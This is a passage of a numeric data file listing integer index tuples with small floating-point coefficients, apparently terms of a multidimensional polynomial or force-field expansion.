[4,4,5,5,10,10 , 1.84177942962e-11],
[4,4,5,5,11,11 , 1.85101392759e-11],
[4,4,5,6,6 , 8.75440954414e-12],
[4,4,5,6,6,7 , 1.09493301836e-11],
[4,4,5,6,6,9 , 4.54951721843e-13],
[4,4,5,6,7,8 , -8.8404337879e-13],
[4,4,5,6,8 , 4.63500674747e-10],
[4,4,5,6,8,9 , 2.55835231911e-11],
[4,4,5,6,10,11 , 2.90518801249e-11],
[4,4,5,7 , -4.09706733804e-09],
[4,4,5,7,7 , 5.06317557806e-11],
[4,4,5,7,7,7 , 5.12861645801e-12],
[4,4,5,7,7,9 , 1.48903377911e-12],
[4,4,5,7,8,8 , -1.91633321638e-11],
[4,4,5,7,9 , -3.11798552266e-10],
[4,4,5,7,9,9 , -1.83411233301e-11],
[4,4,5,7,10,10 , -2.15927107457e-11],
[4,4,5,7,11,11 , -2.19066854273e-11],
[4,4,5,8,8 , -8.51570811878e-11],
[4,4,5,8,8,9 , -5.20721813996e-12],
[4,4,5,8,10,11 , 2.05483862801e-12],
[4,4,5,9 , -4.44147956143e-09],
[4,4,5,9,9 , -1.10170086866e-10],
[4,4,5,9,9,9 , -5.36217184184e-12],
[4,4,5,9,10,10 , 1.72266896141e-12],
[4,4,5,9,11,11 , 1.50025140018e-12],
[4,4,5,10,10 , 5.78613963854e-11],
[4,4,5,11,11 , 5.61110889384e-11],
[4,4,6,6 , 7.87522611615e-09],
[4,4,6,6,6,6 , -2.60421350334e-11],
[4,4,6,6,6,8 , 7.13547955542e-13],
[4,4,6,6,7 , -1.24331117692e-11],
[4,4,6,6,7,7 , -1.2661557148e-11],
[4,4,6,6,7,9 , -2.15956632688e-12],
[4,4,6,6,8,8 , 3.8519350831e-11],
[4,4,6,6,9 , 7.13680443786e-10],
[4,4,6,6,9,9 , 3.80592167047e-11],
[4,4,6,6,10,10 , 4.36316182476e-11],
[4,4,6,6,11,11 , 4.37204070397e-11],
[4,4,6,7,7,8 , 2.88046826109e-12],
[4,4,6,7,8 , -5.37081017113e-10],
[4,4,6,7,8,9 , -2.87307015929e-11],
[4,4,6,7,10,11 , -3.33556612118e-11],
[4,4,6,8 , -4.40958658368e-09],
[4,4,6,8,8,8 , -8.12517461856e-12],
[4,4,6,8,9 , -2.01325081615e-10],
[4,4,6,8,9,9 , -1.05419468541e-11],
[4,4,6,8,10,10 , 1.40547837586e-12],
[4,4,6,8,11,11 , 1.57865185771e-12],
[4,4,6,9,10,11 , 9.96459041294e-14],
[4,4,6,10,11 , 3.25570066572e-11],
[4,4,7 , 1.11036341643e-07],
[4,4,7,7 , 2.06382047205e-09],
[4,4,7,7,7 , -7.16687859914e-12],
[4,4,7,7,7,7 , -7.40827374228e-12],
[4,4,7,7,7,9 , -2.90497398595e-12],
[4,4,7,7,8,8 , 2.13133077826e-11],
[4,4,7,7,9 , 3.94399773769e-10],
[4,4,7,7,9,9 , 2.01066324317e-11],
[4,4,7,7,10,10 , 2.49977882144e-11],
[4,4,7,7,11,11 , 2.48595684099e-11],
[4,4,7,8,8 , 1.98780209407e-10],
[4,4,7,8,8,9 , 1.11830220276e-11],
[4,4,7,8,10,11 , 2.81073141578e-12],
[4,4,7,9 , 3.09931514688e-09],
[4,4,7,9,9 , 2.15906397402e-10],
[4,4,7,9,9,9 , 1.36162111842e-11],
[4,4,7,9,10,10 , 4.27409315064e-12],
[4,4,7,9,11,11 , 3.81785083879e-12],
[4,4,7,10,10 , 3.74831041689e-11],
[4,4,7,11,11 , 3.96394418267e-11],
[4,4,8 , -8.94526349305e-19],
[4,4,8,8 , -3.99275067845e-08],
[4,4,8,8,8,8 , -7.94512897459e-11],
[4,4,8,8,9 , -1.70512448211e-09],
[4,4,8,8,9,9 , -7.63579232485e-11],
[4,4,8,8,10,10 , -8.47783303329e-11],
[4,4,8,8,11,11 , -8.46036207199e-11],
[4,4,8,9,10,11 , -8.38914690971e-11],
[4,4,8,10,11 , -1.88248317706e-09],
[4,4,9 , -5.39757031849e-07],
[4,4,9,9 , -3.96715111604e-08],
[4,4,9,9,9 , -1.63136678902e-09],
[4,4,9,9,9,9 , -7.93031113218e-11],
[4,4,9,9,10,10 , -8.46172737066e-11],
[4,4,9,9,11,11 , -8.45961638419e-11],
[4,4,9,10,10 , -1.87408291328e-09],
[4,4,9,11,11 , -1.8658365139e-09],
[4,4,10 , 5.25160427298e-20],
[4,4,10,10 , -4.30148177395e-08],
[4,4,10,10,10,10 , -9.32167616017e-11],
[4,4,10,10,11,11 , -9.1591301421e-11],
[4,4,11 , 1.3890016846e-20],
[4,4,11,11 , -4.33736036419e-08],
[4,4,11,11,11,11 , -9.74376917797e-11],
[4,5 , -1.14349447879e-20],
[4,5,5,5,5,10 , -1.65606713925e-12],
[4,5,5,5,6,11 , -1.85779402094e-12],
[4,5,5,5,7,10 , 9.03141481847e-13],
[4,5,5,5,8,11 , 1.32423086068e-11],
[4,5,5,5,9,10 , 1.33563066843e-11],
[4,5,5,5,10 , 2.60942215772e-10],
[4,5,5,6,6,10 , -2.5904097499e-12],
[4,5,5,6,7,11 , 1.4489930269e-12],
[4,5,5,6,8,10 , 2.03730616385e-11],
[4,5,5,6,9,11 , 2.06991171091e-11],
[4,5,5,6,11 , 3.82046361511e-10],
[4,5,5,7,7,10 , -4.51966901563e-13],
[4,5,5,7,8,11 , -1.5664868708e-11],
[4,5,5,7,9,10 , -1.53866348195e-11],
[4,5,5,7,10 , -2.79698256094e-10],
[4,5,5,8,8,10 , 2.43321081775e-12],
[4,5,5,8,9,11 , 1.79249479414e-12],
[4,5,5,8,11 , 6.83960428998e-11],
[4,5,5,9,9,10 , 1.38453177475e-12],
[4,5,5,9,10 , 5.33226803828e-11],
[4,5,5,10 , 2.87589942957e-10],
[4,5,5,10,10,10 , 7.50814678653e-12],
[4,5,5,10,11,11 , 6.88080450225e-12],
[4,5,6,6,6,11 , -3.62494560488e-12],
[4,5,6,6,7,10 , 1.70553175287e-12],
[4,5,6,6,8,11 , 3.16531162456e-11],
[4,5,6,6,9,10 , 3.17650128243e-11],
[4,5,6,6,10 , 5.85862472222e-10],
[4,5,6,7,7,11 , -2.40301730162e-13],
[4,5,6,7,8,10 , -2.40065987042e-11],
[4,5,6,7,9,11 , -2.38490587629e-11],
[4,5,6,7,11 , -4.50977797587e-10],
[4,5,6,8,8,11 , 1.9504917616e-12],
[4,5,6,8,9,10 , 9.60168392757e-13],
[4,5,6,8,10 , 6.55151683785e-11],
[4,5,6,9,9,11 , 3.28624052799e-13],
[4,5,6,9,11 , 3.83424407047e-11],
[4,5,6,10,10,11 , 8.75586948688e-12],
[4,5,6,11 , 1.13864041559e-09],
[4,5,6,11,11,11 , 9.03283752938e-12],
[4,5,7,7,7,10 , -1.28400606651e-12],
[4,5,7,7,8,11 , 1.81921589313e-11],
[4,5,7,7,9,10 , 1.76192722729e-11],
[4,5,7,7,10 , 3.51240260244e-10],
[4,5,7,8,8,10 , 1.4157910237e-12],
[4,5,7,8,9,11 , 1.99019282332e-12],
[4,5,7,8,11 , 5.65614187539e-12],
[4,5,7,9,9,10 , 2.48780071064e-12],
[4,5,7,9,10 , 2.25373703524e-11],
[4,5,7,10 , -1.0289138816e-09],
[4,5,7,10,10,10 , -3.42096621772e-12],
[4,5,7,10,11,11 , -3.38944290912e-12],
[4,5,8,8,8,11 , -6.05918962472e-11],
[4,5,8,8,9,10 , -6.11216113124e-11],
[4,5,8,8,10 , -1.36522399992e-09],
[4,5,8,9,9,11 , -6.13463298144e-11],
[4,5,8,9,11 , -1.37279604055e-09],
[4,5,8,10 , -7.44607307905e-20],
[4,5,8,10,10,11 , -6.69775914946e-11],
[4,5,8,11 , -3.07119887838e-08],
[4,5,8,11,11,11 , -6.71076369058e-11],
[4,5,9 , -3.76069393691e-20],
[4,5,9,9,9,10 , -6.11790465795e-11],
[4,5,9,9,10 , -1.37709030952e-09],
[4,5,9,10 , -3.07606000309e-08],
[4,5,9,10,10,10 , -6.72416307949e-11],
[4,5,9,10,11,11 , -6.75590349422e-11],
[4,5,9,11 , 7.27435038388e-20],
[4,5,10 , -3.87053025845e-07],
[4,5,10,10,10 , -1.52761634873e-09],
[4,5,10,11,11 , -1.53090709997e-09],
[4,5,11 , 2.93496916224e-19],
[4,6,6,6,6,10 , -5.25963762403e-12],
[4,6,6,6,7,11 , 1.84733101208e-12],
[4,6,6,6,8,10 , 4.87446967426e-11],
[4,6,6,6,9,11 , 4.85597996857e-11],
[4,6,6,6,11 , 9.13474298699e-10],
[4,6,6,7,7,10 , 2.35976388735e-13],
[4,6,6,7,8,11 , -3.70244456989e-11],
[4,6,6,7,9,10 , -3.6783219065e-11],
[4,6,6,7,10 , -7.01871642935e-10],
[4,6,6,8,8,10 , 1.66790094509e-13],
[4,6,6,8,9,11 , -8.00765841245e-13],
[4,6,6,8,11 , 5.63940483444e-11],
[4,6,6,9,9,10 , -2.1060836101e-12],
[4,6,6,9,10 , 2.41090162499e-11],
[4,6,6,10 , 2.11350696092e-09],
[4,6,6,10,10,10 , 1.00986912179e-11],
[4,6,6,10,11,11 , 1.04154755706e-11],
[4,6,7,7,7,11 , -1.44013962753e-12],
[4,6,7,7,8,10 , 2.78204374129e-11],
[4,6,7,7,9,11 , 2.75598376853e-11],
[4,6,7,7,11 , 5.3500725235e-10],
[4,6,7,8,8,11 , 4.20297593302e-12],
[4,6,7,8,9,10 , 4.84814161964e-12],
[4,6,7,8,10 , 4.07955312724e-11],
[4,6,7,9,9,11 , 5.77095207629e-12],
[4,6,7,9,11 , 6.00716174276e-11],
[4,6,7,10,10,11 , -3.20371199502e-12],
[4,6,7,11 , -2.63286467073e-10],
[4,6,7,11,11,11 , -2.45643244826e-12],
[4,6,8 , -5.03984603616e-20],
[4,6,8,8,8,10 , -9.42668298959e-11],
[4,6,8,8,9,11 , -9.42353049487e-11],
[4,6,8,8,11 , -2.09943623962e-09],
[4,6,8,9,9,10 , -9.43521980144e-11],
[4,6,8,9,10 , -2.10010938802e-09],
[4,6,8,10 , -4.68830865019e-08],
[4,6,8,10,10,10 , -1.0394100435e-10],
[4,6,8,10,11,11 , -1.03818305735e-10],
[4,6,8,11 , -3.92836344708e-20],
[4,6,9,9,9,11 , -9.37047535738e-11],
[4,6,9,9,11 , -2.09622187454e-09],
[4,6,9,10 , 3.83369262597e-20],
[4,6,9,10,10,11 , -1.04168048315e-10],
[4,6,9,11 , -4.66755534655e-08],
[4,6,9,11,11,11 , -1.03883026027e-10],
[4,6,10 , -5.70238461959e-19],
[4,6,10,10,11 , -2.34304317191e-09],
[4,6,11 , -7.1718576865e-07],
[4,6,11,11,11 , -2.34968612209e-09],
[4,7,7,7,7,10 , 1.44247509852e-12],
[4,7,7,7,8,11 , -2.07974184648e-11],
[4,7,7,7,9,10 , -2.06619330824e-11],
[4,7,7,7,10 , -3.70129825226e-10],
[4,7,7,8,8,10 , -6.65055017182e-12],
[4,7,7,8,9,11 , -7.08852551086e-12],
[4,7,7,8,11 , -1.0327280318e-10],
[4,7,7,9,9,10 , -7.96751949972e-12],
[4,7,7,9,10 , -9.88985931406e-11],
[4,7,7,10 , -2.30746120354e-09],
[4,7,7,10,10,10 , -2.54062723525e-12],
[4,7,7,10,11,11 , -1.56666489238e-12],
[4,7,8,8,8,11 , 7.08970029354e-11],
[4,7,8,8,9,10 , 7.06415485724e-11],
[4,7,8,8,10 , 1.58435000237e-09],
[4,7,8,9,9,11 , 7.04693302748e-11],
[4,7,8,9,11 , 1.57691063405e-09],
[4,7,8,10 , 8.52792192269e-20],
[4,7,8,10,10,11 , 7.89234743354e-11],
[4,7,8,11 , 3.62167994999e-08],
[4,7,8,11,11,11 , 7.88180539355e-11],
[4,7,9 , 6.35407059339e-20],
[4,7,9,9,9,10 , 7.0091423825e-11],
[4,7,9,9,10 , 1.57745134943e-09],
[4,7,9,10 , 3.51688943832e-08],
[4,7,9,10,10,10 , 7.94812699789e-11],
[4,7,9,10,11,11 , 7.89669128343e-11],
[4,7,9,11 , -8.56551728153e-20],
[4,7,10 , 6.33282398046e-07],
[4,7,10,10,10 , 1.79741703181e-09],
[4,7,10,11,11 , 1.78792601648e-09],
[4,7,11 , -4.92959940412e-19],
[4,8 , -1.52465930506e-20],
[4,8,8 , 1.11437772123e-20],
[4,8,8,8,8,10 , 1.93207435006e-11],
[4,8,8,8,9,11 , 2.17070348461e-11],
[4,8,8,8,11 , 3.06325932032e-10],
[4,8,8,9,9,10 , 2.27021009929e-11],
[4,8,8,9,10 , 3.7946688133e-10],
[4,8,8,10 , 6.82737615439e-09],
[4,8,8,10,10,10 , -1.95825953572e-12],
[4,8,8,10,11,11 , -3.46021390823e-12],
[4,8,8,11 , 2.23673773537e-20],
[4,8,9,9,9,11 , 2.50926107973e-11],
[4,8,9,9,11 , 4.15849060966e-10],
[4,8,9,10 , 1.21488016566e-20],
[4,8,9,10,10,11 , -1.03577069225e-12],
[4,8,9,11 , 8.24884104345e-09],
[4,8,9,11,11,11 , -1.52058105169e-12],
[4,8,10 , 4.492450994e-19],
[4,8,10,10,11 , -2.03784705663e-10],
[4,8,11 , 1.39973350887e-07],
[4,8,11,11,11 , -2.29483029062e-10],
[4,9 , 2.79520872594e-20],
[4,9,9 , 3.18166750812e-20],
[4,9,9,9,9,10 , 2.76161769455e-11],
[4,9,9,9,10 , 4.94641042751e-10],
[4,9,9,10 , 9.68055939633e-09],
[4,9,9,10,10,10 , 2.4936317917e-12],
[4,9,9,10,11,11 , 1.39612168418e-12],
[4,9,9,11 , -3.30131918373e-20],
[4,9,10 , 1.97256045803e-07],
[4,9,10,10,10 , -1.25844418324e-10],
[4,9,10,11,11 , -1.49916308012e-10],
[4,9,11 , -3.58268466909e-19],
[4,10 , -2.28698895759e-20],
[4,10,10 , -5.19337075785e-20],
[4,10,10,10 , -7.22132126525e-09],
[4,10,10,10,10,10 , -2.41738996756e-11],
[4,10,10,10,11,11 , -2.33885534143e-11],
[4,10,11,11 , -7.06471854448e-09],
[4,10,11,11,11,11 , -2.63386085304e-11],
[4,11 , 4.319868031e-20],
[4,11,11 , -3.0837293236e-20],
[4,11,11,11 , 1.75200989642e-20],
[5,5 , 3.89296923449e-05],
[5,5,5 , -2.21122973303e-07],
[5,5,5,5 , 4.73899361368e-09],
[5,5,5,5,5 , -1.20910053191e-10],
[5,5,5,5,5,5 , 2.1265577845e-12],
[5,5,5,5,5,7 , 1.25215787513e-12],
[5,5,5,5,5,9 , -2.29331673858e-12],
[5,5,5,5,6,6 , -2.54442739401e-12],
[5,5,5,5,6,8 , -2.43007850559e-12],
[5,5,5,5,7 , -9.11309796312e-12],
[5,5,5,5,7,7 , 8.71673272104e-13],
[5,5,5,5,7,9 , 2.58098743835e-12],
[5,5,5,5,8,8 , 7.59574625222e-12],
[5,5,5,5,9 , 1.51066859594e-10],
[5,5,5,5,9,9 , 8.88710227849e-12],
[5,5,5,5,10,10 , 9.91417344746e-12],
[5,5,5,5,11,11 , 1.05915677252e-11],
[5,5,5,6,6 , -4.25132868503e-11],
[5,5,5,6,6,7 , 3.05728458589e-12],
[5,5,5,6,6,9 , -2.70699630683e-12],
[5,5,5,6,7,8 , 2.23667489666e-12],
[5,5,5,6,8 , 2.01572042993e-10],
[5,5,5,6,8,9 , 1.27108456891e-11],
[5,5,5,6,10,11 , 1.60128845457e-11],
[5,5,5,7 , 2.61679500222e-09],
[5,5,5,7,7 , -1.12022734045e-10],
[5,5,5,7,7,7 , 3.54338545921e-12],
[5,5,5,7,7,9 , -9.08370917048e-13],
[5,5,5,7,8,8 , -9.52768037439e-12],
[5,5,5,7,9 , -1.88742650193e-10],
[5,5,5,7,9,9 , -9.15894842312e-12],
[5,5,5,7,10,10 , -1.18727174344e-11],
[5,5,5,7,11,11 , -1.22745057905e-11],
[5,5,5,8,8 , 1.19712553104e-10],
[5,5,5,8,8,9 , 3.64098527182e-12],
[5,5,5,8,10,11 , 5.93976995151e-12],
[5,5,5,9 , 2.96967644278e-09],
[5,5,5,9,9 , 8.083860587e-11],
[5,5,5,9,9,9 , 3.91545184432e-12],
[5,5,5,9,10,10 , 5.74637856442e-12],
[5,5,5,9,11,11 , 5.9358824692e-12],
[5,5,5,10,10 , 1.45416094645e-10],
[5,5,5,11,11 , 1.43572787174e-10],
[5,5,6,6 , 8.29917716326e-10],
[5,5,6,6,6,6 , -6.54124124605e-12],
[5,5,6,6,6,8 , -3.80901041852e-12],
[5,5,6,6,7 , 5.22675888795e-11],
[5,5,6,6,7,7 , -3.72552099596e-12],
[5,5,6,6,7,9 , 2.54324918116e-12],
[5,5,6,6,8,8 , 1.94177645615e-11],
[5,5,6,6,9 , 3.17710088025e-10],
[5,5,6,6,9,9 , 1.93927396493e-11],
[5,5,6,6,10,10 , 2.44188586955e-11],
[5,5,6,6,11,11 , 2.46494464019e-11],
[5,5,6,7,7,8 , -1.52022475013e-12],
[5,5,6,7,8 , -2.46878940198e-10],
[5,5,6,7,8,9 , -1.49445468413e-11],
[5,5,6,7,10,11 , -1.90148688152e-11],
[5,5,6,8 , 2.94669863319e-09],
[5,5,6,8,8,8 , 4.62053287457e-12],
[5,5,6,8,9 , 1.02870713659e-10],
[5,5,6,8,9,9 , 3.11961922807e-12],
[5,5,6,8,10,10 , 7.61822482658e-12],
[5,5,6,8,11,11 , 7.64830037136e-12],
[5,5,6,9,10,11 , 6.76931246041e-12],
[5,5,6,10,11 , 1.66401776173e-10],
[5,5,7 , -3.72434792135e-07],
[5,5,7,7 , 7.44100817223e-09],
[5,5,7,7,7 , -1.21925959131e-10],
[5,5,7,7,7,7 , 2.53923515026e-12],
[5,5,7,7,7,9 , 1.98713288743e-12],
[5,5,7,7,8,8 , 1.18219019113e-11],
[5,5,7,7,9 , 1.54075620273e-10],
[5,5,7,7,9,9 , 1.20422993297e-11],
[5,5,7,7,10,10 , 1.47469688059e-11],
[5,5,7,7,11,11 , 1.52698549705e-11],
[5,5,7,8,8 , -6.35096350999e-11],
[5,5,7,8,8,9 , -6.63799500732e-13],
[5,5,7,8,10,11 , -3.65922200501e-12],
[5,5,7,9 , 1.29797330218e-11],
[5,5,7,9,9 , -7.69942506762e-11],
[5,5,7,9,9,9 , 2.31693937385e-13],
[5,5,7,9,10,10 , -2.67412760689e-12],
[5,5,7,9,11,11 , -3.31165626116e-12],
[5,5,7,10,10 , -8.92001528913e-11],
[5,5,7,11,11 , -1.03472733551e-10],
[5,5,8 , -4.36195498056e-19],
[5,5,8,8 , -2.07390881227e-08],
[5,5,8,8,8,8 , -4.03401012373e-11],
[5,5,8,8,9 , -9.35213737517e-10],
[5,5,8,8,9,9 , -4.24602279874e-11],
[5,5,8,8,10,10 , -4.68857779145e-11],
[5,5,8,8,11,11 , -4.78594509109e-11],
[5,5,8,9,10,11 , -4.85851705936e-11],
[5,5,8,10,11 , -1.09184669491e-09],
[5,5,9 , -2.71232430959e-07],
[5,5,9,9 , -1.97805676776e-08],
[5,5,9,9,9 , -8.8800155866e-10],
[5,5,9,9,9,9 , -3.78427925898e-11],
[5,5,9,9,10,10 , -4.8391120531e-11],
[5,5,9,9,11,11 , -4.8214885868e-11],
[5,5,9,10,10 , -1.08100679565e-09],
[5,5,9,11,11 , -1.0838836922e-09],
[5,5,10 , 3.75738521446e-20],
[5,5,10,10 , -2.60149053036e-08],
[5,5,10,10,10,10 , -4.89288926026e-11],
[5,5,10,10,11,11 , -5.07087237385e-11],
[5,5,11,11 , -2.58541702294e-08],
[5,5,11,11,11,11 , -4.99144486538e-11],
[5,6 , 1.77876918923e-20],
[5,6,6 , 1.11150971702e-07],
[5,6,6,6,6 , -1.18541204951e-10],
[5,6,6,6,6,7 , 7.55715558793e-12],
[5,6,6,6,6,9 , -5.89099354202e-12],
[5,6,6,6,7,8 , 3.21864888448e-12],
[5,6,6,6,8 , 4.88739086391e-10],
[5,6,6,6,8,9 , 3.06636065342e-11],
[5,6,6,6,10,11 , 3.86590554435e-11],
[5,6,6,7 , -2.19348706928e-09],
[5,6,6,7,7 , -4.81653985401e-11],
[5,6,6,7,7,7 , 4.55578292164e-12],
[5,6,6,7,7,9 , -1.65730493993e-12],
[5,6,6,7,8,8 , -2.3216431113e-11],
[5,6,6,7,9 , -3.75465007574e-10],
[5,6,6,7,9,9 , -2.3101569803e-11],
[5,6,6,7,10,10 , -2.94203709701e-11],
[5,6,6,7,11,11 , -2.96209289227e-11],
[5,6,6,8,8 , 1.30991673311e-10],
[5,6,6,8,8,9 , 3.24484775251e-12],
[5,6,6,8,10,11 , 9.2369407431e-12],
[5,6,6,9 , 3.79305515822e-09],
[5,6,6,9,9 , 1.11222316491e-10],
[5,6,6,9,9,9 , 2.30953607889e-12],
[5,6,6,9,10,10 , 8.3961259493e-12],
[5,6,6,9,11,11 , 8.45500386998e-12],
[5,6,6,10,10 , 2.18097714107e-10],
[5,6,6,11,11 , 2.19475770361e-10],
[5,6,7,7,7,8 , 7.49710595826e-13],
[5,6,7,7,8 , 2.86496581354e-10],
[5,6,7,7,8,9 , 1.75956391614e-11],
[5,6,7,7,10,11 , 2.27954409327e-11],
[5,6,7,8 , -2.11974100938e-09],
[5,6,7,8,8,8 , -9.4826051365e-14],
[5,6,7,8,9 , -4.29971256442e-11],
[5,6,7,8,9,9 , 7.98799316056e-13],
[5,6,7,8,10,10 , -3.77774189822e-12],
[5,6,7,8,11,11 , -3.7402796817e-12],
[5,6,7,9,10,11 , -3.08438994959e-12],
[5,6,7,10,11 , -1.00927272762e-10],
[5,6,8 , -3.28913004049e-07],
[5,6,8,8 , -9.85866941265e-20],
[5,6,8,8,8 , -1.45271630487e-09],
[5,6,8,8,8,9 , -6.63108836602e-11],
[5,6,8,8,10,11 , -7.46223341437e-11],
[5,6,8,9 , -3.06193458597e-08],
[5,6,8,9,9 , -1.46601732876e-09],
[5,6,8,9,9,9 , -6.69216599474e-11],
[5,6,8,9,10,10 , -7.50969210067e-11],
[5,6,8,9,11,11 , -7.55113449972e-11],
[5,6,8,10,10 , -1.68734437533e-09],
[5,6,8,11,11 , -1.70160831222e-09],
[5,6,9 , 5.3564246002e-19],
[5,6,9,9 , 9.88356754909e-20],
[5,6,9,9,10,11 , -7.58306789943e-11],
[5,6,9,10,11 , -1.70330153832e-09],
[5,6,10,10 , -6.14152653499e-20],
[5,6,10,10,10,11 , -7.90362220693e-11],
[5,6,10,11 , -3.93140303306e-08],
[5,6,10,11,11,11 , -7.99664957651e-11],
[5,6,11 , 3.22401915549e-20],
[5,6,11,11 , 6.16290915383e-20],
[5,7,7 , -4.59466414062e-07],
[5,7,7,7 , 9.41457901134e-09],
[5,7,7,7,7 , -2.31711035503e-10],
[5,7,7,7,7,7 , 8.91484305361e-12],
[5,7,7,7,7,9 , 1.65861394026e-12],
[5,7,7,7,8,8 , -1.24901400249e-11],
[5,7,7,7,9 , -2.85808987696e-10],
[5,7,7,7,9,9 , -1.1237152655e-11],
[5,7,7,7,10,10 , -1.62626319367e-11],
[5,7,7,7,11,11 , -1.64195417612e-11],
[5,7,7,8,8 , -8.09810454039e-12],
[5,7,7,8,8,9 , -2.6503853906e-12],
[5,7,7,8,10,11 , 2.36039477836e-13],
[5,7,7,9 , 4.49786145175e-09],
[5,7,7,9,9 , -2.54198315431e-11],
[5,7,7,9,9,9 , -3.76925496171e-12],
[5,7,7,9,10,10 , -7.34989889556e-13],
[5,7,7,9,11,11 , -2.47567551417e-13],
[5,7,7,10,10 , 2.08672170453e-11],
[5,7,7,11,11 , 2.08192395184e-11],
[5,7,8 , 2.11215606332e-19],
[5,7,8,8 , 2.38753414212e-08],
[5,7,8,8,8,8 , 5.02528465339e-11],
[5,7,8,8,9 , 1.10627256859e-09],
[5,7,8,8,9,9 , 5.09126105294e-11],
[5,7,8,8,10,10 , 5.71883142374e-11],
[5,7,8,8,11,11 , 5.76899803968e-11],
[5,7,8,9,10,11 , 5.73796690935e-11],
[5,7,8,10,11 , 1.29869104509e-09],
[5,7,9 , 1.33418850099e-07],
[5,7,9,9 , 2.47899578325e-08],
[5,7,9,9,9 , 1.10190408832e-09],
[5,7,9,9,9,9 , 5.62805969245e-11],
[5,7,9,9,10,10 , 5.84009848039e-11],
[5,7,9,9,11,11 , 5.82935663914e-11],
[5,7,9,10,10 , 1.30446852446e-09],
[5,7,9,11,11 , 1.30324370379e-09],
[5,7,10 , -2.45374856908e-20],
[5,7,10,10 , 3.02473671837e-08],
[5,7,10,10,10,10 , 6.23279638451e-11],
[5,7,10,10,11,11 , 6.19476971078e-11],
[5,7,11,11 , 3.09448834142e-08],
[5,7,11,11,11,11 , 6.39820547174e-11],
[5,8 , -3.72694496792e-20],
[5,8,8 , -9.04661970021e-08],
[5,8,8,8,8 , -5.92579393475e-11],
[5,8,8,8,8,9 , 7.21783564596e-12],
[5,8,8,8,10,11 , -1.05994195232e-11],
[5,8,8,9 , -1.00562822348e-09],
[5,8,8,9,9 , 7.92166549617e-11],
[5,8,8,9,9,9 , 1.02047793533e-11],
[5,8,8,9,10,10 , -7.0480045462e-12],
[5,8,8,9,11,11 , -7.68781499304e-12],
[5,8,8,10,10 , -3.62254471637e-10],
[5,8,8,11,11 , -3.45972336037e-10],
[5,8,9 , -3.91223342513e-20],
[5,8,9,9,10,11 , -5.27014440856e-12],
[5,8,9,10,11 , -2.91981513253e-10],
[5,8,10,10 , -3.53470819356e-20],
[5,8,10,10,10,11 , -2.81174965439e-11],
[5,8,10,11 , -1.19410319712e-08],
[5,8,10,11,11,11 , -2.73667165656e-11],
[5,8,11 , -3.53900953275e-20],
[5,9 , 4.40457132572e-20],
[5,9,9 , -1.27265303579e-07],
[5,9,9,9 , 1.20928803346e-09],
[5,9,9,9,9 , 8.860786044e-11],
[5,9,9,9,9,9 , -1.04229761485e-11],
[5,9,9,9,10,10 , -4.81165461688e-12],
[5,9,9,9,11,11 , -6.88563862485e-12],
[5,9,9,10,10 , -2.58927154767e-10],
[5,9,9,11,11 , -2.71714801033e-10],
[5,9,10 , -4.11075677214e-20],
[5,9,10,10 , -1.10359913106e-08],
[5,9,10,10,10,10 , -2.45102496096e-11],
[5,9,10,10,11,11 , -2.46974165382e-11],
[5,9,10,11 , 2.0234078554e-20],
[5,9,11,11 , -1.12325632309e-08],
[5,9,11,11,11,11 , -2.81691785013e-11],
[5,10 , 1.01643953671e-20],
[5,10,10 , -4.08522824124e-07],
[5,10,10,10,10 , -7.45476488901e-10],
[5,10,10,11,11 , -6.99396516753e-10],
[5,11,11 , -4.52623631061e-07],
[5,11,11,11,11 , -7.59131514903e-10],
[6,6 , 4.53797985501e-05],
[6,6,6,6 , 5.69429165949e-09],
[6,6,6,6,6,6 , -2.07186249549e-11],
[6,6,6,6,6,8 , -7.42563882204e-12],
[6,6,6,6,7 , 9.63164662397e-11],
[6,6,6,6,7,7 , -8.78381472076e-12],
[6,6,6,6,7,9 , 4.57076918526e-12],
[6,6,6,6,8,8 , 4.60925182856e-11],
[6,6,6,6,9 , 8.15129212016e-10],
[6,6,6,6,9,9 , 4.54504757931e-11],
[6,6,6,6,10,10 , 5.81085225362e-11],
[6,6,6,6,11,11 , 5.72322408643e-11],
[6,6,6,7,7,8 , -1.76820251793e-12],
[6,6,6,7,8 , -6.0182320356e-10],
[6,6,6,7,8,9 , -3.61822368333e-11],
[6,6,6,7,10,11 , -4.55913362013e-11],
[6,6,6,8 , 6.23674439857e-09],
[6,6,6,8,8,8 , 2.88212978776e-12],
[6,6,6,8,9 , 1.4606059529e-10],
[6,6,6,8,9,9 , 1.38375968315e-12],
[6,6,6,8,10,10 , 1.09368477126e-11],
[6,6,6,8,11,11 , 1.09237281273e-11],
[6,6,6,9 , -1.06685619504e-20],
[6,6,6,9,10,11 , 9.71509753344e-12],
[6,6,6,10,11 , 2.68841347009e-10],
[6,6,7 , -1.95165441159e-07],
[6,6,7,7 , 3.3615720387e-09],
[6,6,7,7,7 , 1.74210856675e-11],
[6,6,7,7,7,7 , -4.80574763783e-12],
[6,6,7,7,7,9 , 8.09165201794e-13],
[6,6,7,7,8,8 , 2.69372657822e-11],
[6,6,7,7,9 , 4.67354360633e-10],
[6,6,7,7,9,9 , 2.68210462039e-11],
[6,6,7,7,10,10 , 3.46953962881e-11],
[6,6,7,7,11,11 , 3.4768585513e-11],
[6,6,7,8,8 , -2.80200422964e-11],
[6,6,7,8,8,9 , 3.12524928882e-12],
[6,6,7,8,10,11 , -3.2026323528e-12],
[6,6,7,9 , -3.62959259012e-09],
[6,6,7,9,9 , -1.90774655351e-11],
[6,6,7,9,9,9 , 6.86275354012e-12],
[6,6,7,9,10,10 , -1.30263561127e-12],
[6,6,7,9,11,11 , -1.84637221279e-12],
[6,6,7,10,10 , -9.80071325959e-11],
[6,6,7,11,11 , -9.46216836794e-11],
[6,6,8 , -8.89649292413e-19],
[6,6,8,8 , -4.75714540065e-08],
[6,6,8,8,8 , -1.06543641707e-20],
[6,6,8,8,8,8 , -1.03823585179e-10],
[6,6,8,8,9 , -2.21216736793e-09],
[6,6,8,8,9,9 , -1.02341603642e-10],
[6,6,8,8,10,10 , -1.15839617348e-10],
[6,6,8,8,11,11 , -1.15564267694e-10],
[6,6,8,9,10,11 , -1.16009157364e-10],
[6,6,8,10,11 , -2.61578490203e-09],
[6,6,9 , -5.58452679966e-07],
[6,6,9,9 , -4.80491445789e-08],
[6,6,9,9,9 , -2.12392247055e-09],
[6,6,9,9,9,9 , -1.07305678104e-10],
[6,6,9,9,10,10 , -1.17614216964e-10],
[6,6,9,9,11,11 , -1.16157235086e-10],
[6,6,9,10,10 , -2.61088263718e-09],
[6,6,9,11,11 , -2.58703520261e-09],
[6,6,10 , 6.25745589784e-20],
[6,6,10,10 , -6.21330696856e-08],
[6,6,10,10,10,10 , -1.27696382579e-10],
